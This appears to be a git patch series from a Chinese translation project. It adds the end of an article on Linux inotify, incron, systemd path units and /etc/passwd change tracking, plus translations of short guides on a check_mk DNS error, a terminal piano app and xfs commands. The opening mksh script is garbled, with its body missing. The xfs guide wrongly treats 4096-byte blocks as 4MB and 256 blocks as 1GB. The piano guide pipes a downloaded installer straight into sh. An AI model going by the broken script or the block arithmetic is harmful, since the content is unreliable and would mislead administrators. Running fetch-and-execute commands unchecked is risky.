+The mksh binary is the smallest of the Bourne implementations above (some of these shells may be missing on your system, but you can install them with yum). For a long-term monitoring process, mksh is likely the best choice for reducing both processing and memory footprint, and it does not launch multiple copies of itself when idle, assuming that a coprocess is used. Converting the script to use a Korn coprocess that is friendly to mksh is not difficult:
+
+```
+
+#!/bin/mksh
+unset IFS # default of space, tab and nl
+ # Wait for filesystem events
+inotifywait -m -e close_write \
+ /tmp/ /var/tmp/ /home/oracle/arch-orcl/ \
+ 2 ~oracle/.curlog-$ORACLE_SID
+
+) 9>~oracle/.processing_logs-$ORACLE_SID
+
+```
+
+The above script can be executed manually for testing even while the inotify handler is running, as the flock protects it.
+
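+The flock pattern that protects the handler looks roughly like the following minimal sketch; the body is a placeholder, not the full log shipper:
+
+```
+
+#!/bin/ksh93
+# Sketch of the flock-protected critical section; the real work
+# (shipping or applying newly arrived archive logs) goes inside
+# the parentheses.
+(
+ flock -n 9 || exit 1 # Critical section-only one process.
+
+ # ... process the newly arrived archive logs here ...
+
+) 9>~oracle/.processing_logs-$ORACLE_SID
+
+```
+
+A second invocation started by hand while the handler holds the lock simply exits because of the non-blocking -n flag, rather than interfering with the running copy.
+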
+A standby server, or an Oracle Data Guard server in primitive standby mode, can apply the archived logs at regular intervals. The script below forces a 12-hour delay in log application to allow recovery of dropped or damaged objects, so inotify cannot easily be used in this case—cron is a more reasonable approach for delayed file processing, and a run every 20 minutes (a sample crontab entry follows the script) will keep the standby at the desired recovery point:
+
+```
+
+# cat ~oracle/archutils/delay-lock.sh
+
+#!/bin/ksh93
+
+(
+ flock -n 9 || exit 1 # Critical section-only one process.
+
+ WINDOW=43200 # 12 hours
+
+ LOG_DEST=~oracle/arch-$ORACLE_SID
+
+ OLDLOG_DEST=$LOG_DEST-applied
+
+ function fage { print $(( $(date +%s) - $(stat -c %Y "$1") ))
+ } # File age in seconds - Requires GNU extended date & stat
+
+ cd $LOG_DEST
+
+ of=$(ls -t | tail -1) # Oldest file in directory
+
+ [[ -z "$of" || $(fage "$of") -lt $WINDOW ]] && exit
+
+ for x in $(ls -rt) # Order by ascending file mtime
+ do if [[ $(fage "$x") -ge $WINDOW ]]
+ then y=$(basename $x .lz) # lzip compression is optional
+
+ [[ "$y" != "$x" ]] && /usr/local/bin/lzip -dkq "$x"
+
+ $ORACLE_HOME/bin/sqlplus '/ as sysdba' > /dev/null 2>&1 <<-EOF
+ recover standby database;
+ $LOG_DEST/$y
+ cancel
+ quit
+ EOF
+
+ [[ "$y" != "$x" ]] && rm "$y"
+
+ mv "$x" $OLDLOG_DEST
+ fi
+
+ done
+) 9> ~oracle/.recovering-$ORACLE_SID
+
+```
+
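+A crontab entry for the oracle user along the following lines would provide the 20-minute cadence mentioned above; this entry is only a sketch, and the absolute script path is an assumption to be adjusted to your layout:
+
+```
+
+# oracle user's crontab (crontab -e), hypothetical entry
+*/20 * * * * /home/oracle/archutils/delay-lock.sh
+
+```
+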
+I've covered these specific examples here because they introduce tools to control concurrency, which is a common issue when using inotify, and they demonstrate a few features that increase reliability and minimize storage requirements. Hopefully enthusiastic readers will introduce many improvements to these approaches.
+
+### The incron System
+
+Lukas Jelinek is the author of the incron package, which allows users to specify tables of inotify events that are executed by the master incrond process. Despite the reference to "cron", the package does not schedule events at regular intervals—the name is slightly misleading, as incron is purely a tool for filesystem events.
+
+The incron package is available from EPEL. If you have enabled that repository, you can install it with yum:
+
+```
+
+# yum install incron
+Loaded plugins: langpacks, ulninfo
+Resolving Dependencies
+--> Running transaction check
+---> Package incron.x86_64 0:0.5.10-8.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+=================================================================
+ Package Arch Version Repository Size
+=================================================================
+Installing:
+ incron x86_64 0.5.10-8.el7 epel 92 k
+
+Transaction Summary
+==================================================================
+Install 1 Package
+
+Total download size: 92 k
+Installed size: 249 k
+Is this ok [y/d/N]: y
+Downloading packages:
+incron-0.5.10-8.el7.x86_64.rpm | 92 kB 00:01
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+ Installing : incron-0.5.10-8.el7.x86_64 1/1
+ Verifying : incron-0.5.10-8.el7.x86_64 1/1
+
+Installed:
+ incron.x86_64 0:0.5.10-8.el7
+
+Complete!
+
+```
+
+On a systemd distribution with the appropriate service units, you can start and enable incron at boot with the following commands:
+
+```
+
+# systemctl start incrond
+# systemctl enable incrond
+Created symlink from
+ /etc/systemd/system/multi-user.target.wants/incrond.service
+to /usr/lib/systemd/system/incrond.service.
+
+```
+
+In the default configuration, any user can establish incron schedules. The incrontab format uses three fields:
+
+```
+<path> <mask> <command>
+```
+
+Below is an example entry that was set with the -e option:
+
+```
+
+$ incrontab -e #vi session follows
+
+$ incrontab -l
+/tmp/ IN_ALL_EVENTS /home/luser/myincron.sh $@ $% $#
+
+```
+
+You can then write a simple handler script and mark it with execute permission:
+
+```
+
+$ cat myincron.sh
+#!/bin/sh
+
+echo -e "path: $1 op: $2 \t file: $3" >> ~/op
+
+$ chmod 755 myincron.sh
+
+```
+
+Then, if you repeat the original /tmp file manipulations at the start of this article, the script will record the following output:
+
+```
+
+$ cat ~/op
+
+path: /tmp/ op: IN_ATTRIB file: hello
+path: /tmp/ op: IN_CREATE file: hello
+path: /tmp/ op: IN_OPEN file: hello
+path: /tmp/ op: IN_CLOSE_WRITE file: hello
+path: /tmp/ op: IN_OPEN file: passwd
+path: /tmp/ op: IN_CLOSE_WRITE file: passwd
+path: /tmp/ op: IN_MODIFY file: passwd
+path: /tmp/ op: IN_CREATE file: passwd
+path: /tmp/ op: IN_DELETE file: passwd
+path: /tmp/ op: IN_CREATE file: goodbye
+path: /tmp/ op: IN_ATTRIB file: goodbye
+path: /tmp/ op: IN_OPEN file: goodbye
+path: /tmp/ op: IN_CLOSE_WRITE file: goodbye
+path: /tmp/ op: IN_DELETE file: hello
+path: /tmp/ op: IN_DELETE file: goodbye
+
+```
+
+While the IN_CLOSE_WRITE event on a directory object is usually of greatest interest, most of the standard inotify events are available within incron, which also offers several unique amalgams:
+
+```
+
+$ man 5 incrontab | col -b | sed -n '/EVENT SYMBOLS/,/child process/p'
+
+EVENT SYMBOLS
+
+These basic event mask symbols are defined:
+
+IN_ACCESS File was accessed (read) (*)
+IN_ATTRIB Metadata changed (permissions, timestamps, extended
+ attributes, etc.) (*)
+IN_CLOSE_WRITE File opened for writing was closed (*)
+IN_CLOSE_NOWRITE File not opened for writing was closed (*)
+IN_CREATE File/directory created in watched directory (*)
+IN_DELETE File/directory deleted from watched directory (*)
+IN_DELETE_SELF Watched file/directory was itself deleted
+IN_MODIFY File was modified (*)
+IN_MOVE_SELF Watched file/directory was itself moved
+IN_MOVED_FROM File moved out of watched directory (*)
+IN_MOVED_TO File moved into watched directory (*)
+IN_OPEN File was opened (*)
+
+When monitoring a directory, the events marked with an asterisk (*)
+above can occur for files in the directory, in which case the name
+field in the returned event data identifies the name of the file within
+the directory.
+
+The IN_ALL_EVENTS symbol is defined as a bit mask of all of the above
+events. Two additional convenience symbols are IN_MOVE, which is a com-
+bination of IN_MOVED_FROM and IN_MOVED_TO, and IN_CLOSE, which combines
+IN_CLOSE_WRITE and IN_CLOSE_NOWRITE.
+
+The following further symbols can be specified in the mask:
+
+IN_DONT_FOLLOW Don't dereference pathname if it is a symbolic link
+IN_ONESHOT Monitor pathname for only one event
+IN_ONLYDIR Only watch pathname if it is a directory
+
+Additionally, there is a symbol which doesn't appear in the inotify sym-
+bol set. It is IN_NO_LOOP. This symbol disables monitoring events until
+the current one is completely handled (until its child process exits).
+
+```
+
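+For instance, narrowing the earlier table entry to the close-write event alone might look like the following sketch, built from the example entry shown above:
+
+```
+
+/tmp/ IN_CLOSE_WRITE /home/luser/myincron.sh $@ $% $#
+
+```
+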
+The incron system likely presents the most comprehensive interface to inotify of all the tools researched and listed here. Additional configuration options can be set in /etc/incron.conf to tweak incron's behavior for those who require a non-standard configuration.
+
+### Path Units under systemd
+
+When your Linux installation is running systemd as PID 1, limited inotify functionality is available through "path units" as is discussed in a lighthearted [article by Paul Brown][8] at OCS-Mag.
+
+The relevant manual page has useful information on the subject:
+
+```
+
+$ man systemd.path | col -b | sed -n '/Internally,/,/systems./p'
+
+Internally, path units use the inotify(7) API to monitor file systems.
+Due to that, it suffers by the same limitations as inotify, and for
+example cannot be used to monitor files or directories changed by other
+machines on remote NFS file systems.
+
+```
+
+Note that when a systemd path unit spawns a shell script, the $HOME variable and the bare tilde (~) operator for the owner's home directory may not be defined. Using the tilde operator with an explicit user name (for example, ~nobody/) does work, even when it names the same user that is running the script. The Oracle script above never references ~ without specifying the target user, which is why I use it as the example here.
+
+Using inotify triggers with systemd path units requires two files. The first file specifies the filesystem location of interest:
+
+```
+
+$ cat /etc/systemd/system/oralog.path
+
+[Unit]
+Description=Oracle Archivelog Monitoring
+Documentation=http://docs.yourserver.com
+
+[Path]
+PathChanged=/home/oracle/arch-orcl/
+
+[Install]
+WantedBy=multi-user.target
+
+```
+
+The PathChanged parameter above roughly corresponds to the close-write event used in my previous direct inotify calls. The full collection of inotify events is not (currently) supported by systemd—it is limited to PathExists, PathChanged and PathModified, which are described in man systemd.path.
+
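+If notification on each write, rather than only when a written file is closed, is preferred, a hypothetical variant of the unit above could use PathModified instead:
+
+```
+
+[Path]
+PathModified=/home/oracle/arch-orcl/
+
+```
+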
+The second file is a service unit describing a program to be executed. It must have the same name, but a different extension, as the path unit:
+
+```
+
+$ cat /etc/systemd/system/oralog.service
+
+[Unit]
+Description=Oracle Archivelog Monitoring
+Documentation=http://docs.yourserver.com
+
+[Service]
+Type=oneshot
+Environment=ORACLE_SID=orcl
+ExecStart=/bin/sh -c '/root/process_logs >> /tmp/plog.txt 2>&1'
+
+```
+
+The oneshot parameter above alerts systemd that the program that it forks is expected to exit and should not be respawned automatically—the restarts are limited to triggers from the path unit. The redirections in the ExecStart line above capture the handler's output for logging—divert them to /dev/null if they are not needed.
+
+Use systemctl start on the path unit to begin monitoring—a common error is using it on the service unit, which will directly run the handler only once. Enable the path unit if the monitoring should survive a reboot.
+
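+Concretely, using the oralog unit names from this example (a sketch; run as root):
+
+```
+
+# systemctl start oralog.path
+# systemctl enable oralog.path
+
+```
+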
+Although this limited functionality may be enough for some casual uses of inotify, it is a shame that the full functionality of inotifywait and incron is not represented here. Perhaps it will come in time.
+
+### Conclusion
+
+Although the inotify tools are powerful, they do have limitations. To repeat them: inotify cannot monitor remote (NFS) filesystems; it cannot report the userid involved in a triggering event; it does not work with /proc or other pseudo-filesystems; mmap() operations do not trigger it; and the inotify queue can overflow, resulting in lost events, among other concerns.
+
+Even with these weaknesses, the efficiency of inotify is superior to most other approaches for immediate notifications of filesystem activity. It also is quite flexible, and although the close-write directory trigger should suffice for most usage, it has ample tools for covering special use cases.
+
+In any event, it is productive to replace polling activity with inotify watches, and system administrators should be liberal in educating the user community that the classic crontab is not an appropriate place to check for new files. Recalcitrant users should be confined to Ultrix on a VAX until they develop sufficient appreciation for modern tools and approaches, which should result in more efficient Linux systems and happier administrators.
+
+### Sidenote: Archiving /etc/passwd
+
+Tracking changes to the password file involves many different types of inotify triggering events. The vipw utility commonly will make changes to a temporary file, then clobber the original with it. This can be seen when the inode number changes:
+
+```
+
+# ll -i /etc/passwd
+199720973 -rw-r--r-- 1 root root 3928 Jul 7 12:24 /etc/passwd
+
+# vipw
+[ make changes ]
+You are using shadow passwords on this system.
+Would you like to edit /etc/shadow now [y/n]? n
+
+# ll -i /etc/passwd
+203784208 -rw-r--r-- 1 root root 3956 Jul 7 12:24 /etc/passwd
+
+```
+
+The destruction and replacement of /etc/passwd even occurs with setuid binaries called by unprivileged users:
+
+```
+
+$ ll -i /etc/passwd
+203784196 -rw-r--r-- 1 root root 3928 Jun 29 14:55 /etc/passwd
+
+$ chsh
+Changing shell for fishecj.
+Password:
+New shell [/bin/bash]: /bin/csh
+Shell changed.
+
+$ ll -i /etc/passwd
+199720970 -rw-r--r-- 1 root root 3927 Jul 7 12:23 /etc/passwd
+
+```
+
+For this reason, all inotify triggering events should be considered when tracking this file. If there is concern about an inotify queue overflow (in which events are lost), then the OPEN, ACCESS and CLOSE_NOWRITE,CLOSE triggers can likely be ignored immediately, as in the sketch below.
+
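+One way to wire that up is sketched below; the directory is watched rather than the file itself, so that the watch survives the inode replacement, and the handler name is a placeholder for a script such as the one that follows:
+
+```
+
+# Sketch: watch /etc, react only to meaningful events on passwd.
+inotifywait -m -e attrib -e modify -e close_write -e moved_to \
+ -e create -e delete /etc |
+while read dir op file
+do [[ "${file}" == passwd ]] && ~/track_passwd.sh # placeholder handler
+done
+
+```
+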
+All other inotify events on /etc/passwd might run the following script to version the changes into an RCS archive and mail them to an administrator:
+
+```
+
+#!/bin/sh
+
+# This script tracks changes to the /etc/passwd file from inotify.
+# Uses RCS for archiving. Watch for UID zero.
+
+PWMAILS=Charlie.Root@openbsd.org
+
+TPDIR=~/track_passwd
+
+cd $TPDIR
+
+if diff -q /etc/passwd $TPDIR/passwd
+then exit # they are the same
+else sleep 5 # let passwd settle
+ diff /etc/passwd $TPDIR/passwd 2>&1 | # they are DIFFERENT
+ mail -s "/etc/passwd changes $(hostname -s)" "$PWMAILS"
+ cp -f /etc/passwd $TPDIR # copy for checkin
+
+# "SCCS, the source motel! Programs check in and never check out!"
+# -- Ken Thompson
+
+ rcs -q -l passwd # lock the archive
+ ci -q -m_ passwd # check in new ver
+ co -q passwd # drop the new copy
+fi > /dev/null 2>&1
+
+```
+
+Here is an example email from the script for the chsh operation above:
+
+```
+
+-----Original Message-----
+From: root [mailto:root@myhost.com]
+Sent: Thursday, July 06, 2017 2:35 PM
+To: Fisher, Charles J. ;
+Subject: /etc/passwd changes myhost
+
+57c57
+< fishecj:x:123:456:Fisher, Charles J.:/home/fishecj:/bin/bash
+---
+> fishecj:x:123:456:Fisher, Charles J.:/home/fishecj:/bin/csh
+
+```
+
+Further processing on the third column of /etc/passwd might detect UID zero (a root user) or other important user classes for emergency action, as sketched below. This might include a rollback of the file from RCS to /etc and/or SMS messages to security contacts.
+
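+A minimal check of that third field might look like the following sketch; the action taken on a match is an assumption:
+
+```
+
+# Flag any account granted UID 0 other than root itself.
+awk -F: '$3 == 0 && $1 != "root" { print "UID zero account: " $1 }' /etc/passwd
+
+```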
+
+--------------------------------------------------------------------------------
+
+via: http://www.linuxjournal.com/content/linux-filesystem-events-inotify
+
+作者:[Charles Fisher][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:http://www.nongnu.org/lzip
+[2]:http://www.nongnu.org/lzip/xz_inadequate.html
+[3]:http://www.7-zip.org
+[4]:http://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx
+[5]:http://www.linuxjournal.com/content/flat-file-encryption-openssl-and-gpg
+[6]:http://www.linuxjournal.com/article/8478
+[7]:https://fedoraproject.org/wiki/EPEL
+[8]:http://www.ocsmag.com/2015/09/02/monitoring-file-access-for-dummies
From f38d737b359c9b5042531993df1e5afdf9baf743 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 23:19:40 +0800
Subject: [PATCH 278/371] translate done: 20171017 check_mk error Cannot fetch
deployment URL via curl error.md
---
...not fetch deployment URL via curl error.md | 62 -------------------
...not fetch deployment URL via curl error.md | 61 ++++++++++++++++++
2 files changed, 61 insertions(+), 62 deletions(-)
delete mode 100644 sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
create mode 100644 translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
diff --git a/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md b/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
deleted file mode 100644
index 245d424f1b..0000000000
--- a/sources/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
+++ /dev/null
@@ -1,62 +0,0 @@
-translating by lujun9972
-check_mk error Cannot fetch deployment URL via curl error
-======
-Article explaining 'ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.' and how to resolve it.
-
-![ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.][1]
-
-check_mk is a utility which helps you configure your server to be monitored via [nagios monitoring tool][2]. While configuring one of the client I came across below error :
-
-`ERROR Cannot fetch deployment URL via curl: Couldn't resolve host. The given remote host was not resolved.`
-
-This error came after I tried to register client with monitoring server with below command :
-
-```
-root@kerneltalks# /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
-```
-
-Here in this command -
-
-`-s` is monitoring server
-`-i` is Name of Check_MK site on that server
-`-H` is Host name to fetch agent for
-`-p` is protocol Either http or https (default is https)
-`-U` User-ID of a user who is allowed to download the agent.
-`-S` is secret. Automation secret of that user (in case of automation user)
-From error you can figure out that command is not able to resolve monitoring server DNS name `monitor.kerneltalks.com`
-
-### Solution :
-
-Its pretty simple. Check `/etc/resolv.conf` to make sure that you have proper DNS server entry for your environment. If it still dosnt resolve issue then you can add entry in [/etc/hosts][3] for it.
-
-```
-root@kerneltalks# cat /etc/hosts
-10.0.10.9 monitor.kerneltalks.com
-```
-
-Thats it. You would be able to register now successfully.
-
-```
-root@kerneltalks # /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
-Going to register agent at deployment server
-Successfully registered agent for deployment.
-You can now update your agent by running 'cmk-update-agent -v'
-Saved your registration settings to /etc/cmk-update-agent.state.
-```
-
-By the way you can directly use IP address for `-s` switch and get rid of all above jargon including error itself!
-
---------------------------------------------------------------------------------
-
-via: https://kerneltalks.com/troubleshooting/check_mk-register-cannot-fetch-deployment-url-via-curl-error/
-
-作者:[kerneltalks][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://kerneltalks.com
-[1]:https://c4.kerneltalks.com/wp-content/uploads/2017/10/resolve-check_mk-error.png
-[2]:https://www.nagios.org/
-[3]:https://kerneltalks.com/linux/understanding-etc-hosts-file/
diff --git a/translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md b/translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
new file mode 100644
index 0000000000..03952c5750
--- /dev/null
+++ b/translated/tech/20171017 check_mk error Cannot fetch deployment URL via curl error.md
@@ -0,0 +1,61 @@
+如何解决 check_mk 出现 "Cannot fetch deployment URL via curl" 的错误
+======
+本文解释了 'ERROR Cannot fetch deployment URL via curl:Couldn't resolve host。The given remote host was not resolved。' 的原因及其解决方案。
+
+![ERROR Cannot fetch deployment URL via curl:Couldn't resolve host。The given remote host was not resolved。][1]
+
+check_mk 是一个帮你配置 [nagios][2] 监控服务器的工具。然后在配置其中一台机器时,我遇到了下面的错误:
+
+`ERROR Cannot fetch deployment URL via curl:Couldn't resolve host。The given remote host was not resolved。`
+
+该错误是在我使用下面命令尝试将该机器注册到监控服务器时发生的:
+
+```
+root@kerneltalks# /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+```
+
+其中-
+
+`-s` 指明监控服务器
+`-i` 指定服务器上 Check_MK 站点的名称
+`-H` 指定 agent 所在的主机名
+`-p` 为协议,可以是 http 或 https (默认为 https)
+`-U` 允许下载 agent 的用户 ID
+`-S` 为密码。用户的自动操作密码(当是自动用户时)
+从错误中可以看出,命令无法解析监控服务器的 DNS 名称 `monitor.kerneltalks.com`
+
+### 解决方案:
+
+超级简单。检查 `/etc/resolv.conf`,确保你的 DNS 配置正确。如果还解决不了这个问题那么你可以直接在 [/etc/hosts][3] 中指明它的 IP。
+
+```
+root@kerneltalks# cat /etc/hosts
+10.0.10.9 monitor.kerneltalks.com
+```
+
+这就搞定了。你可能成功注册了。
+
+```
+root@kerneltalks # /usr/bin/cmk-update-agent register -s monitor.kerneltalks.com -i master -H `hostname` -p http -U omdadmin -S ASFKWEFUNSHEFKG -v
+Going to register agent at deployment server
+Successfully registered agent for deployment.
+You can now update your agent by running 'cmk-update-agent -v'
+Saved your registration settings to /etc/cmk-update-agent.state.
+```
+
+另外,你也可以为 `-s` 直接指定 IP 地址,就没那么多事了!
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/troubleshooting/check_mk-register-cannot-fetch-deployment-url-via-curl-error/
+
+作者:[kerneltalks][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c4.kerneltalks.com/wp-content/uploads/2017/10/resolve-check_mk-error.png
+[2]:https://www.nagios.org/
+[3]:https://kerneltalks.com/linux/understanding-etc-hosts-file/
From 66f54bdefa598024712076242f5d39e9edd78ce1 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 01:01:45 +0800
Subject: [PATCH 279/371] translate done: 20171028 Let Us Play Piano In
Terminal Using Our PC Keyboard.md
---
...Piano In Terminal Using Our PC Keyboard.md | 41 +++++++++----------
1 file changed, 20 insertions(+), 21 deletions(-)
rename {sources => translated}/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md (60%)
diff --git a/sources/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md b/translated/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
similarity index 60%
rename from sources/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
rename to translated/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
index 13b40af238..9da14a545e 100644
--- a/sources/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
+++ b/translated/tech/20171028 Let Us Play Piano In Terminal Using Our PC Keyboard.md
@@ -1,18 +1,17 @@
-translating by lujun9972
-Let Us Play Piano In Terminal Using Our PC Keyboard
+让我们使用 PC 键盘在终端演奏钢琴
======
-Feel bored at work? Come on guys, let us play Piano! Yeah, you read it right. Who needs a real Piano? We can now play or learn how to play Piano from command line using our PC keyboard. Meet **Piano-rs** - a simple utility, written in Rust programming language, that allows you to play the Piano in Terminal using PC keyboard. It is free, open source and licensed under MIT license. You can use it on any operating systems that supports Rust.
+厌倦了工作?那么来吧,让我们弹弹钢琴!是的,你没有看错。谁需要真的钢琴啊?我们可以用 PC 键盘在命令行下就能弹钢琴。向你们介绍一下 **Piano-rs** - 这是一款用 Rust 语言编写的,可以让你用 PC 键盘在终端弹钢琴的简单工具。它免费,开源,而且基于 MIT 协议。你可以在任何支持 Rust 的操作系统中使用它。
-### Piano-rs : Play Piano In Terminal Using Our PC Keyboard
+### Piano-rs:使用 PC 键盘在终端弹钢琴
-#### Installation
+#### 安装
-Make sure your system have Rust programming language installed. If you haven't installed Rust already, run the following command to install it.
+确保系统已经安装了 Rust 编程语言。若还未安装,运行下面命令来安装它。
```
curl https://sh.rustup.rs -sSf | sh
```
-The installer will ask whether you want to proceed the installation with default values or customize the installation or cancel the installation. I want to install it with default values, so I typed **1** (Number one).
+安装程序会问你是否默认安装还是自定义安装还是取消安装。我希望默认安装,因此输入 **1** (数字一)。
```
info: downloading installer
@@ -73,47 +72,47 @@ environment variable. Next time you log in this will be done automatically.
To configure your current shell run source $HOME/.cargo/env
```
-Log out or reboot your system to get updated the cargo's bin directory in your PATH variable.
+登出然后重启系统来将 cargo 的 bin 目录纳入 PATH 变量中。
-Verify if Rust has been properly installed or not:
+校验 Rust 是否正确安装:
```
$ rustc --version
rustc 1.21.0 (3b72af97e 2017-10-09)
```
-Great! Rust is installed successfully. It is time build piano-rs application.
+太棒了!Rust 成功安装了。是时候构建 piano-rs 应用了。
-Git clone the Piano-rs repository using the following command:
+使用下面命令克隆 Piano-rs 仓库:
```
git clone https://github.com/ritiek/piano-rs
```
-The above command will create a directory called "piano-rs" in the current working directory and download all contents in it. Change to that directory:
+上面命令会在当前工作目录创建一个名为 "piano-rs" 的目录并下载所有内容到其中。进入该目录:
```
cd piano-rs
```
-Finally, run the following command to build Piano-rs:
+最后,运行下面命令来构建 Piano-rs:
```
cargo build --release
```
-The compiling process will take a while.
+编译过程要花上一阵子。
#### Usage
-Once the compilation process finished, run the following command from **piano-rs** directory:
+编译完成后,在 **piano-rs** 目录中运行下面命令:
```
./target/release/piano-rs
```
-Here is our Piano keyboard in Terminal! It is time play some notes. Press the keys to play the notes. Use **LEFT/RIGHT** arrow keys to adjust note frequency while playing. And, use **UP/Down** arrows to adjust note duration while playing.
+这就我们在终端上的钢琴键盘了!可以开始弹指一些音符了。按下按键可以弹奏相应音符。使用 **左/右** 方向键可以在弹奏时调整音频。而,使用 **上/下** 方向键可以在弹奏时调整音长。
[![][1]][2]
-Piano-rs uses the same notes and key bindings as [**multiplayerpiano.com**][3]. Alternatively, use [**these notes**][4] to learn to play various popular songs.
+Piano-rs 使用与 [**multiplayerpiano.com**][3] 一样的音符和按键。另外,你可以使用[**这些音符 **][4] 来学习弹指各种流行歌曲。
-To view the help section. type:
+要查看帮助。输入:
```
$ ./target/release/piano-rs -h
```
@@ -135,11 +134,11 @@ OPTIONS:
-s, --sequence Frequency sequence from 0 to 5 to begin with (Default: 2)
```
-I must admit that it is a super cool project. For those who couldn't afford to buy a Piano, use this application.
+我必须承认这是个超级酷的项目。对于那些买不起钢琴的人,很推荐使用这款应用。
-Have fun and happy weekend!!
+祝你周末愉快!!
-Cheers!
+此致敬礼!
From 0605b18698836319a04f017dda37d6be3ff40c91 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 09:58:49 +0800
Subject: [PATCH 280/371] translate done: 20180102 xfs file system commands
with examples.md
---
... xfs file system commands with examples.md | 46 +++++++++----------
1 file changed, 21 insertions(+), 25 deletions(-)
rename {sources => translated}/tech/20180102 xfs file system commands with examples.md (67%)
diff --git a/sources/tech/20180102 xfs file system commands with examples.md b/translated/tech/20180102 xfs file system commands with examples.md
similarity index 67%
rename from sources/tech/20180102 xfs file system commands with examples.md
rename to translated/tech/20180102 xfs file system commands with examples.md
index c0f834dba6..4b9e878279 100644
--- a/sources/tech/20180102 xfs file system commands with examples.md
+++ b/translated/tech/20180102 xfs file system commands with examples.md
@@ -4,11 +4,11 @@ xfs file system commands with examples
![Learn xfs commands with examples][1]
-In our another article we walked you through [what is xfs, features of xfs etc][2]. In this article we will see some frequently used xfs administrative commands. We will see how to create xfs filesystem, how to grow xfs filesystem, how to repair xfs file system and check xfs filesystem along with command examples.
+在我们另一篇文章中,我带您领略了一下[什么事 xfs,xfs 的相关特性等内容 ][2]。本文我们来看一些常用的 xfs 管理命令。我们将会通过几个例子来讲解如何创建 xfs 文件系统,如何对 xfs 文件系统进行扩容,如何检测并修复 xfs 文件系统。
-### Create XFS filesystem
+### 创建 XFS 文件系统
-`mkfs.xfs` command is used to create xfs filesystem. Without any special switches command output looks like one below -
+`mkfs.xfs` 命令用来创建 xfs 文件系统。无需任何特别的参数,其输出如下:
```
root@kerneltalks # mkfs.xfs /dev/xvdf
meta-data=/dev/xvdf isize=512 agcount=4, agsize=1310720 blks
@@ -22,11 +22,11 @@ log =internal log bsize=4096 blocks=2560, version=2
realtime =none extsz=4096 blocks=0, rtextents=0
```
-> Note : Once XFS filesystem is created it can not be reduced. It can only be extended to bigger size.
+> 注意:一旦 XFS 文件系统创建完毕就不能在缩容而只能进行扩容了。
-### Resize XFS file system
+### 调整 XFS 文件系统容量
-In XFS, you can only extend file system and can not reduce it. To grow XFS file system use `xfs_growfs`. You need to specify new size of mount point along with `-D` switch. `-D` takes argument number as file system blocks. If you dont supply `-D` switch, `xfs_growfs` will grow filesystem to maximum available limit on that device.
+你职能对 XFS 进行扩容而不能缩容。我们使用 `xfs_growfs` 来进行扩容。你需要使用 `-D` 参数指定挂载点的新容量。`-D` 接受一个数字的参数,指定文件系统块的数量。若你没有提供 `-D` 参数,则 `xfs_growfs` 会将文件系统扩到最大。
```
root@kerneltalks # xfs_growfs /dev/xvdf -D 256
@@ -42,7 +42,7 @@ realtime =none extsz=4096 blocks=0, rtextents=0
data size 256 too small, old size is 2883584
```
-In above output, observe last line. Since I supplied new size smaller than the existing size, `xfs_growfs`didnt change filesystem. This show you can not reduce XFS file system. You can only extend it.
+观察上面的输出中的最后一行。由于我分配的容量要小于现在的容量。它告诉你不能缩减 XFS 文件系统。你只能对他进行扩展。
```
root@kerneltalks # xfs_growfs /dev/xvdf -D 2883840
@@ -58,17 +58,17 @@ realtime =none extsz=4096 blocks=0, rtextents=0
data blocks changed from 2883584 to 2883840
```
-Now, I supplied new size 1GB extra and it successfully grew the file system.
+现在我多分配了 1GB 的空间,而且也成功地扩增了容量。
- **1GB blocks calculation :**
+ **1GB 块的计算方式:**
-Current filesystem has bsize=4096 i.e. block size of 4MB. We need 1 GB i.e. 256 blocks. So add 256 in current number of blocks i.e. 2883584 which gives you 2883840\. So I used 2883840 as argument to `-D` switch.
+当前文件系统 bsize 为 4096,意思是块的大小为 4MB。我们需要 1GB,也就是 256 个块。因此在当前块数,2883584 上加上 256 得到 2883840。因此我为 `-D` 传递参数 2883840。
-### Repair XFS file system
+### 修复 XFS 文件系统
-File system consistency check and repair of XFS can be performed using `xfs_repair` command. You can run command with `-n` switch so that it will not modify anything on filesystem. It will only scans and reports which modification to be done. If you are running it without -n switch, it will modify file system wherever necessary to make it clean.
